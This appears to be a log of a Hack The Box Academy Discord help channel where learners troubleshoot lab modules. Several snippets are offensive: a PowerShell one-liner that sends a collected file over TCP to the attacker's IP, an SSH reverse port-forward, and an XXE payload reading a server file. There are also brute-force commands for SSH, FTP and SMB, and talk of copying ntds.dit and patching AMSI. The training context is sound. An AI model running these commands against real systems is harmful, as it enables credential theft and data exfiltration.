4-ssh -R <InternalIPofPivotHost>:8080:0.0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN
and at the same time I am listening from the atack host but there is no connection.

Also the logic in the room seems wrong to me. I already need to create a bridge with extra ssh to reach the windows machine because I can't connect to windows from the ubuntu machine because there are no tools and they are not downloaded from the internet.

quiet trout
#

Not looking at the module, but im not sure i follow your attack flow there, step 3 appears create a request (GET?) which downloads the payload but does not run it, is there more thats not there?

#

createing a web req on the ubuntu server would download the file locally though? perhaps you need to use the python server to SERVE the python request (script?) then retrieve it from the windows machine and run it?

#

@solar grove ^

pure jetty
#

Good

normal sand
#

Module: Windows Privilege Escalation
Section: Event Log Readers
Link to section: https://academy.hackthebox.com/module/67/section/602

In this section, it states the following:

Note: Searching the Security event log with Get-WinEvent requires administrator access or permissions adjusted...

What's the point of if administrator permissions are required? I'm assuming you'll need administrative privileges to modify the registry key too?

normal sand
quiet trout
#

SOC Analyst -> Windows Attacks/Def -> ACLs

https://academy.hackthebox.com/module/176/section/1789

I'm having a hard time exfiling the sharphound output zip to the pwnbox to visualize the data from the windows box...

here's my approach... a powershell stream back to the pwnbox with nc

$client = New-Object System.Net.Sockets.TcpClient("10.10.15.58", 9001); $stream = $client.GetStream(); $writer = New-Object System.IO.StreamWriter($stream); $writer.Write([System.IO.File]::ReadAllText("c:\users\bob\downloads\bh.zip")); $writer.Flush(); $writer.Close(); $stream.Close(); $client.Close();

the nc listener just stays running... even tho the zip is only 13kb

is bloodhound installed on the windows machine? cant find it, or perhaps another less error prone way to do this?

next bronze
quiet trout
#

im being lazy -_-

#

but im kinda out of options aint shit working prob firewall

#

actually i dont think i've done drive mount over rdp before

next bronze
quiet trout
#

wow this is quite easy

#

@next bronze capital idea, putting some respect on yo name.

naive sage
gray stratus
tribal linden
#

Any one able to give me some help with Abusing HTTP Misconfigirations Skills assessment - Hard?

tardy plume
#

hello, I'm having issues with my nmap scan. I'm still new and would like to know if anyone had nmap scans take 10+ mins.

limber river
tardy plume
#

{ip} -p- -sV

#

i'm currently using pwnbox

limber river
tardy plume
#

@limber river what does -t4 do?

limber river
gleaming cairn
#

Can anyone help me with “Windows Lateral Movement
\ Skills Assessment” I'm stuck on the question ‘What is the password for VNC?’. I did everything right and even wrote to support, they told me to do what I already tried to do, apparently it's a bug, but then they just told me to email them and that's it.

tender nimbus
#

Hey guys anyne know if i an use a username list with crackmap?

gleaming cairn
#

remove the dot and write the full path to the dictionary.

gray yacht
tender nimbus
#

mb i used the wrong path do you guys know why ./crafted.txt don't work?

#

for crackmap do i need to use full path?

gleaming cairn
#

depending on where crafted.txt is located

tender nimbus
gleaming cairn
gray yacht
dapper moth
#

You have to do it in the VNC server not the client

gleaming cairn
#

Where is it located? Isn't it on the support server?

dapper moth
#

No

#

Backup

gleaming cairn
#

After all, that's the only place WSUS has access to

#

It's not pinging from any server

dapper moth
#

Did you get access to Backup?

midnight galleon
#

bloodhound module
SharpHound - Data Collection from Windows
when i runas /netonly /user:INLANEFREIGHT\htb-student cmd.exe
it asks us for password which isnt available

gleaming cairn
dapper moth
#

The module is pretty much structured as to jump from one host to another

dapper moth
tender nimbus
#

i accidently cleared the term with the password -_- do you guys know how to save the positive user and pwd with crackmap? i guess if i do > creds.txt also the failures will be in there?

gleaming cairn
dapper moth
#

What device blocks network access or traffic?

gleaming cairn
#

Firewall?

dapper moth
#

The most basic one anyways

humble prairie
#

hi dear member I just joined the platform and I wanted a mentor to guide me in learning

dapper moth
gleaming cairn
#

So I have to push an update to disable the firewall?

#

wtf xdd

dapper moth
#

You will need admin privs to read the registry after

dapper moth
midnight galleon
gleaming cairn
#

Thank you so much bro, I didn't think they'd be so hardcore.

dapper moth
#

The rest is pretty straightforward

gleaming cairn
#

This is very strange, if there is a firewall on the server, why is it not pinging from wsus? But it is still possible to release updates.

dapper moth
#

Would you block windows update on your servers?

dapper moth
gleaming cairn
#

I scanned all ports and found nothing, but it was from support server, maybe there is something with wsus.

tender nimbus
#

guys is it possible that you cant connect with every useraccount on winrm?

#

i found some credentials but cant log to winrm

dapper moth
tender nimbus
quiet trout
elder saddle
#

I am having a hard time wrapping my head around CIDR. Why would it be /26 for an ip address of 192.168.12.160. Why wouldn't it be /27 since the last octect needs both the 128 and the 32 place to make ip address?

lusty hound
#

i have a question , what im not chat in #general ? , i dont know 😦

tender nimbus
#

Hey guys can you help? I do the same then in the lab but i cant copy it?

#

i know that there is the crackmapexec method but i want to try this one to

quiet trout
dapper moth
elder saddle
#

ah, ok. Thank you!

quiet trout
#

you can do this quick by subtracting the total bits (32) minus your range, and squaring it.... if you are tested you will see something like.... what is the first valid host on the 192.168.173.193/30 subnet.

you should be able to do these in your head, a good quizzing site is like this:
https://www.subnetting.net/Start.aspx

its basically mandatory to be able to work these out quickly and correctly for the ccna...

i say "should" bc most people (yours truly included) learned this stuff for certs/exams but im finding myself unable to do them rapidly after years of non-use (we use calculators or whatever in real world so it never comes up)

#

@elder saddle ^

elder saddle
#

I appreciate that. That's definitely something I need to work on.

safe star
#

Just use move or copy

#

Also evil-winrm has a download feature, but it’s kinda slow

kindred zodiac
#

hello everyone. I'm studying the Web Fuzzing module, and I've come to where Wenum explains. When I try to install the tool as described via the pipx command it doesn't work.

dense stone
#

Hey kids

kindred zodiac
#

I hope I'm asking for help in the right place

quiet trout
#

still looking for help here regarding an rdp sanity check if anyone has access and would be so kind... #modules message

manic adder
#

i am not able to connect remote host using ''HTB_@cademy_stdnt" password. anyone here for helping me

safe star
#

Yeah that’s why you need to move the copy

#

Not the real one

tender nimbus
#

BUT QLSO THIS ONE DONT ZORK

#

my bad for caps

safe star
#

Did you make a ntds directory first?

#

I don’t see one

tender nimbus
#

its just the shadow copy that dont want to work

safe star
#

What’s wrong with the copy

tender nimbus
#

when i do it i don"t have the file so i cant transfer it to my smb share

#

i have a ntds.dit in the windows\ntds\

#

but in the module they show to use the command i just did

safe star
#

Alr imma try it out

tender nimbus
#

thanks ^^

safe star
safe star
tender nimbus
#

gonnq try again

rustic sage
#

I just directly used cme on that one 😂😂😂

tender nimbus
gleaming cairn
#

because it's always used by the process

#

by lsass

tender nimbus
gleaming cairn
#

wtf

gleaming cairn
#

you can use shadowcopy to copy it normally.

tender nimbus
tender nimbus
gleaming cairn
#

it's in the impacket.

safe star
tender nimbus
#

ow okje but i need the system file to i will check that later thanks for you help both of you

short bone
#

can someone help me, im trying to do the linux fundementals and for the first question of find files and directories i cant get the answer. I even googled a guide and ran the command suggested in the guide but i get no file. question is "What is the name of the config file that has been created after 2020–03–03 and is smaller than 28k but larger than 25k?"

im running the terminal command find / -iname "*.conf" -size +25k -size -28k -newermt 2023-03-03 2>/dev/null and i get nothing

short bone
#

thank you

rocky estuary
#

guys i'm doing the bruteforce module and the python script given "pin-solver.py" for the first section keep crashing any idea ?

shut vapor
bright pivot
rocky estuary
# shut vapor Crashing can mean anything. If you're getting any feedback you'd have to provide...

Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connection.py", line 203, in _new_conn
sock = connection.create_connection(
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 85, in create_connection
raise err
File "/usr/lib/python3/dist-packages/urllib3/util/connection.py", line 73, in create_connection
sock.connect(sa)
TimeoutError: [Errno 110] Connection timed out

#

its crash after a few attempts

pine dune
#

Hi guys

#

Im on the password mutations challenge and I used this command

shut vapor
pine dune
rocky estuary
pine dune
#

here is my command

#

to brute force the ssh

shut vapor
rocky estuary
shut vapor
#

yea, good thinking

rocky estuary
rocky estuary
pine dune
shut vapor
#

@pine dune Sorry to chop up your question. Sounds like you've done everything right so far and I'll bet you're wondering why it's going to take 90 days to crack ssh

#

Consider if other services might use the same authentication mechanism on the back end.

rocky estuary
pine dune
pine dune
shut vapor
#

😉

pine dune
pine dune
# shut vapor 😉

thank you...im a little new to enumeration and I hate it. What service would u recommend I enumeratee instead of ssh?

#

maybe ftp?

safe star
#

maybe 🤷‍♂️

shut vapor
#

I would suggest you try them all and figure out which is fastest, using which tool, and with what options.

pine dune
#

haha thank u, I'll give it a shot!

#

okay thanks

#

what exactly are threads?

shut vapor
#

yea, like this challenge specifically I took the opportunity to figure out what every tool was good at cracking and note my preferences down for the service. i know it's tedious but you learn a lot.

shut vapor
pine dune
pine dune
shut vapor
#

E.g. If you have one thread, it can try one password until it receives results... ifyou have 10 threads each of those 10 threads can try a different password.

#

in parallel

rocky estuary
shut vapor
#

Right, as SORA notes you'll choke either your computer or the network or the service at some point if you floor it.

pine dune
pine dune
#

whats a decent number of threads? someone told me 48?

pine dune
shut vapor
#

For this challenge 48 is probably good, but it's entirely sensitive to the environment at the time.

pine dune
#

ahh ok, any ideas for the errors above? all i changed was the sservice if i know correctly

safe star
# pine dune

i suggest using hydra for everything else but winrm and smb

shut vapor
safe star
#

plus thats not a windows machine

shut vapor
#

This shows that you're authenticating with the user "\sam". When authenticating against SMB you've always got to provide a workgroup or domain. E.g. "SOMETHING\sam".

gilded radish
#

try .txt instead of list

shut vapor
#

There are 3 options to do this with netexec / crackmapexec

gilded radish
#

change ext, It might read it wrong

gilded radish
#

.list > .txt

pine dune
#

ok ill try txt

pine dune
#

the mut password is saved as .list tho

shut vapor
gilded radish
#

wait

#

smb, he uses ftp

shut vapor
#

In the image he shared he is using CME with SMB. You're right for FTP.

gilded radish
#

okay then

pine dune
#

do I have to enumerate an smb workgroup for sam?

gilded radish
#

did you read module?

shut vapor
pine dune
#

yeah I did but I read it a while ago and coming back to the question today

shut vapor
#

It's not cheating to go back and reference things.

gilded radish
#

read again...

pine dune
#

okay Ill try that

#

okay

gilded radish
#

cme smb IP -u '' -p'' --users

#

-u guest

pine dune
gilded radish
#

okay, and if you use list of password, then provide .txt file

#

it doesn't recognize .list

pine dune
gilded radish
#

yeah

pine dune
#

thanks, lemme try

#

guys i figured out why it wasnt working

#

I wasnt in the correct folder

analog dock
pine dune
#

crackmapexec ftp 10.129.21.126 -u sam -p mut_password.txt

#

I used this and boy did it give results instantaneously

#

think all of them are coming back red tho big_think

analog dock
#

And I’d use netexec instead of cme

#

Cme is no longer maintained

pine dune
#

ok ill try netexec

#

ill try hydra first since its in my notes

foggy monolith
#

IMO, someone on HTB's payroll (@blissful verge? @gilded lion?) needs to straight-up sed -i 's/crackmapexec/nxc/g' all the module content. There's more outdated stuff where that came from (i.e. a clear lack of Ligolo content in the pivoting module), but at least that would bring everything up to code.

pine dune
#
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-04 19:45:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 94044 login tries (l:1/p:94044), ~5878 tries per task
[DATA] attacking ftp://10.129.21.126:21/
[STATUS] 288.00 tries/min, 288 tries in 00:01h, 93756 to do in 05:26h, 16 active
[STATUS] 154.67 tries/min, 464 tries in 00:03h, 93590 to do in 10:06h, 6 active
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
[INFO] Writing restore file because 2 server scans could not be completed
[ERROR] 1 target was disabled because of too many errors
[ERROR] 1 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-04 19:48:51
rocky estuary
fossil fossil
#

is it normal that the dmz box in attacking enterprise module dies when running rpcinfo?

simple ruin
#

Here we go again... lol

safe star
fossil fossil
noble sand
#

hey, i'm looking for help for windows evasion about running seatbelt in memory. I've tried multiple way to patch amsi and it seems it worked but can't run seatbelt after

rough comet
#

Silly question.... on AD Attacks Module - Enumerating from Windows. When using BloodHound to find how many Kerberoastable accounts, may I assume that we just count the nodes? That's what I did at least.

harsh gorge
#

@rough comet Your query is correct

rough comet
#

Or does Bloodhound show just the number, somehow, somewhere?

harsh gorge
#

You may use that and a few other methods to find the users you can kerbroast

rough comet
#

right right

loud socket
rough comet
#

but there is no obscure feature that shows just the number? Yeah, I got the answer, just wanted to know

harsh gorge
#

It is rather ineffecient to do it at scale though

rough comet
#

Got it!

#

Ok, so just count!

harsh gorge
#

But I do believe Bloodhound CAN show kerbroastable users as a view

rough comet
#

hmmm

harsh gorge
#

Let me make sure

rough comet
#

interesting

harsh gorge
loud socket
harsh gorge
#

Okay so this is a custom view that someone made

rough comet
#

off topic but related... I could not use xfreerdp... I've had RDP issues the whole week. Never used rdesktop till now. Was the only workaround.

pearl kernel
#

Hello Guy
I have been having issues with Windows Event Logs session
after Analyzing the event with ID 4624, that took place on 8/3/2022 at 10:23:25I the only executable i found was services.exe
However, it is showing that is not the answer . any idea on what will be the right answer ?

tender nimbus
#

Hello i guess the question was already asked but are there problems with xfreerdp?

atomic coyote
#

Ok I got what should be an easy question. I am trying to submit a flag on the Nmap Module, Nmap Scripting Engine Section. I have the flag ||H...}.|| I cut and paste it ensure no spaces are on the front or tail of the string. I keep getting a response it's the wrong answer. What am I missing? 🙂

atomic coyote
shell ore
#

lemme check the section rq

atomic coyote
tender nimbus
atomic coyote
shell ore
#

wrong

tender nimbus
#

for other scripts

shell ore
#

scripting section right?

atomic coyote
#

Nmap Scripting Engine section

shell ore
#

repeate ur enumeration

atomic coyote
#

Really? A false flag eh. lol Ok I'll keep looking.

shell ore
#

weird tho

#

can u DM me how u find it? im curious

atomic coyote
#

Incoming DM 🙂

tender nimbus
#

if you want any help dont hesitate

#

if rdp is not working how am i suposse to go further lol

pine dune
tender nimbus
pine dune
#

on password attack module

tender nimbus
#

im also on it i can help you 🙂

#

what did you did so far?

pine dune
proper oar
pine dune
#

so Im trying with hydra now

tender nimbus
#

did hydra already tried the whole mut_password.txt file?

pine dune
tender nimbus
#

okej i understand it

#

you command is good

#

but what is weired is that with you it can execute

#

that is my output

#

but if you look in the section it says that with hydra you can sometimes have errors

#

with that hint you should get it i guess

noble sand
tender nimbus
tender nimbus
pine dune
pine dune
#

is that before password attacks?

tender nimbus
pine dune
#

ahh yes

#

I tried crackmapexec

tender nimbus
#

tell me when its good

pine dune
shut quest
pine dune
tender nimbus
#

which tool are you gonna use now? did you find it?

tender nimbus
pine dune
#

let me see

tender nimbus
# pine dune let me see

like i said you hydra command for bruteforce ftp was good but like you saw it was taking a while there are other ways

pine dune
#

I wasnt getting any error 😅

tender nimbus
pine dune
#

ahh I didnt try smb

#

Ill try smb with msfconsole?

tender nimbus
#

yeah you tried ftp whcih is not a bad idea i mean if you have 5 hours to spend

pine dune
#

ahh

tender nimbus
pine dune
#

ok cool let me try that, thanks

tender nimbus
pine dune
#

myb msfconsole or update hydra

tender nimbus
pine dune
#

doesnt support smbv1

tender nimbus
#

tada en what does the section suggest?

pine dune
#

we can manually update and recompile hydra or use another very powerful tool, the Metasploit framework.

tender nimbus
shut quest
#

@pine dune and @tender nimbus you should take this to DMs since this isn't a tier 0 module.

pine dune
#

thank u

pine dune
tender nimbus
opal nexus
# pine dune thank u

I deleted my message due to 'Gubarz' note. You can DM me for further assistance.

rustic sage
#

How can i copy and paste text from my browser to the pwnbox

tender nimbus
#

Hey guys do you know how to clone that release?

rustic sage
#

it doesn't let me

tender nimbus
#

i need the exe file

rustic sage
#

as normal

tender nimbus
rugged turtle
#

curl $url -o $filename

atomic coyote
tender nimbus
rugged turtle
shut quest
#

If you just want the source it's bundled right below in the zip

tender nimbus
shut quest
#

What?

gaunt linden
#

Looking for help with advanced xss Exploiting internal Web Applications I

foggy monolith
#

And if you're trying to get it onto a target machine, I suggest reviewing the File Transfers module. You're going to need to use those methods a lot in subsequent modules.

simple ruin
simple ruin
#

so i'm having a problem figuring out how to load my pub key to the remote server???

sick whale
#

copy paste ?

#

Talking SSH pub key I assume?

rustic sage
#

stuck on this, module cracking passwords, got the user and password for the smb, i cant seem to access directories within the shares.

simple ruin
ocean night
#

nvm you said pub, not priv

sick whale
#

And have you put the pub key in authorized_keys (or whatever exact name of the folder is)

simple ruin
sick whale
#

If you do, chmod 600 although I think you'd get a different error if you didn't

keen bobcat
#

how to start doing hack the box if i only know programming in python and lua and some lunix experience and i know how pcs works ,but no hacking experience

old shoal
#

hola

#

alguien que hable español?

sick whale
old shoal
#

ya grx

sick whale
ocean night
#

English only please 🙂 #rules

sick whale
ocean night
#

Thanks

old shoal
#

ya lo hice gracias

#

You can only speak in English so no Spanish in any chat

sick whale
# ocean night Thanks

That's actually a side question (can take it to DM if you prefer) : Why not have a side #general-ES server (applicable in whichever is your 2nd most spoken language in your userbase of course) ?

ocean night
#

Quesiton for the mods to be honest

#

and I'm about to go to bed

sick whale
ocean night
#

Main concern is mods being unable to moderate content in a language that they are not fluent in.

old shoal
#

It's not really good because I don't know much English and even if I learn quickly it will take me a long time.}

ocean night
#

Move this to general please - this channel is for module discussions

old shoal
#

ok not problem thanks for the information

carmine delta
#

hi I'm trying a log poisoning but it doesn't seem to work I'm in the lfi module at the last exercise
do you have any ideas

gray yacht
orchid monolith
#

HI Anyone complete Abusing HTTP Misconfigurations "Common Session Variables (Account Takeover)", can you reccomend how to bypass 2MFA?

gray yacht
carmine delta
gray yacht
orchid monolith
#

Hi admin, please give me the recommend.

sick whale
#

All the 10 cubes modules give you the 10 cubes back by completing them. So they're basically free as long as you have the 10 cubes in the first place

#

I believe they are all the Tier 0 modules (TBC)

vocal pulsar
#

hi everyone please help me with

module: Pivoting, Tunneling, and
Port Forwarding

Submit the contents of C:\Flag.txt located on the Domain Controller.

I have ntlm hash v****
I connected and saw there IP addre ****10.5 on Z:\ but what should I do next, I seem to have reached a dead end, help

river marsh
#

is it possible to set up a VPN on my parrot VM so i dont need to use the in browser pwnbox?

gray yacht
river marsh
#

how

gray yacht
#

Actually just DM me this isn't really module related.

rose sage
#

Is this the place that we can get help with modules in understanding them?

cloud urchin
#

yes

rose sage
#

I’m am barely on information security foundations - Linux fundamentals module. I have gone through the reading material but it seems I am not understanding questions for lab. It does not seem to pertain to the text learning using commands more, less, head, tail, grep, etc. Is it just me that is not understanding or are the questions pertaining to the lesson?

cloud urchin
#

include what section and question you're on

rose sage
#

Oh sorry forgot that. Filter contents section. How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

cloud urchin
#

yeah seems like that section doesn't really cover it, i haven't done that module but i'm guessing it builds off previous sections? the netstat command can show this to you

rose sage
#

Ok so it’s not just me then? The other 2 questions are similar that it does not seem to go with lesson.

cloud urchin
#

again i'm not sure i didn't do that module, it could build off previous sections

rose sage
#

Ok sounds good. Thanks for the help

shut quest
rose sage
foggy monolith
night crypt
#

ugh nvm, I swear I tried what it just accepted T^T

calm obsidian
#

POST /addEvent.php HTTP/1.1

Host: 94.237.54.201:54512

User-Agent: curl/8.5.0

Accept: /

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: http://94.237.54.201:54512/event.php

Content-Type: application/x-www-form-urlencoded

Content-Length: 284

Origin: http://94.237.54.201:54512

Connection: keep-alive

Cookie: PHPSESSID=u5mub8b79qc2euunnhq4fe8v93; uid=52

<?xml version="1.0"?>

<!DOCTYPE details [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.php"> ]>
<root>
<name>thisname&xxe; </name>
<details>123</details>
<date>3333-11-22</date>
</root>

#

Why did this HTTP request not work when ther was 2 lines between the XML but it worked when there was only 1 line seperating

rocky estuary
#

guys i'm doing login brute module and it ask to brute ssh with medusa but i get this error everytime i use it "ERROR: No supported authentication methods located."

lunar wadi
rocky estuary
acoustic owl
#

You have to specify the port

lunar wadi
#

For the Nmap Enumeration module of CPTS hard lab requires interacting with a port, but I could not find the port and it was only looking at forum that I could find it. So I have been trying to practice performance/timing options so I will be able to enumerate more comprehensively going forward. Howevre I could not for the life of me get a UDP scan which when scanning all ports with -p- would take over 2 hours, and experimenting with timing configurations, I could get it to a reasonable amount of time but then I wouldnt detect the port. I have been unable to replicate a full port scan via UDP that would take less than 2 hours and yet discover the port required to answer the question.

rocky estuary
acoustic owl
#

If a public IP appears as a target, this is a Docker container.
Then you may ONLY use this one port.

#

Everything else on this IP does not belong to your attack vector

rocky estuary
lunar wadi
#

I think payloadbunny is saying to specify the port in your medusa command

acoustic owl
rocky estuary
acoustic owl
rocky estuary
acoustic owl
rocky estuary
#

its working my bad thanks for the help

lunar wadi
worldly pike
#

hello, Firewall and IDS/IPS Evasion - Hard Lab
it very hard, i found ports open:
22/tcp open ssh
80/tcp open http
i tried many command as -Pn -sS -sA -A... none of them gave me a result of the service

tender nimbus
#

There are only .py files

#

Anyone an idea or hint to convert .py in .exe so that i can transfer it to my target?

tender nimbus
#

mb wait i think i got it

gilded cave
#

I am working on the Nibbles - Web Footprinting from Getting Started and it seems that any path that ends with / is rejected by the server.
For example a redirect from /nibbleblog to /nibbleblog/ will never return anything

#
$ whatweb http://nibbles.htb/nibbleblog
http://nibbles.htb/nibbleblog [301 Moved Permanently] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.79.125], RedirectLocation[http://nibbles.htb/nibbleblog/], Title[301 Moved Permanently]
ERROR Opening: http://nibbles.htb/nibbleblog/ - Net::ReadTimeout

Any idea what could be wrong? Is the module working correctly?

rustic sage
next bronze
bright coral
rustic sage
tender nimbus
#

Hey guys do you have some tools for password hunting? I'm on the section and it takes a while before finding someting

next bronze
#

<@&861185840277487616>

rustic sage
#

to what i need to authenticate too, i got the user and password just it doesn't let me view inside of the shares

gray stratus
lunar wadi
stable jasper
#

i'm at the nmap module but scanning take so much time, is there a command to speed up the process for a -sV -p- scan ? i've got a pretty good connection (i'm using a vm, not pwnbox), ty

lunar turtle
next bronze
jolly yacht
#

In Network Enumeration with NMAP > Performance section, the max-retries argument is set to 10 in default so if the nmap did not received any response from the target within rtt timeout the nmap will retry upto mentioned max-retries times right? but why it just retrying for only 1 time if i disabled host discovery or only 8 times if i enabled the host discovery ? I tried with the target that doesn't exist in my LAN for this so I can see how it works and improve my understanding.

stable jasper
next bronze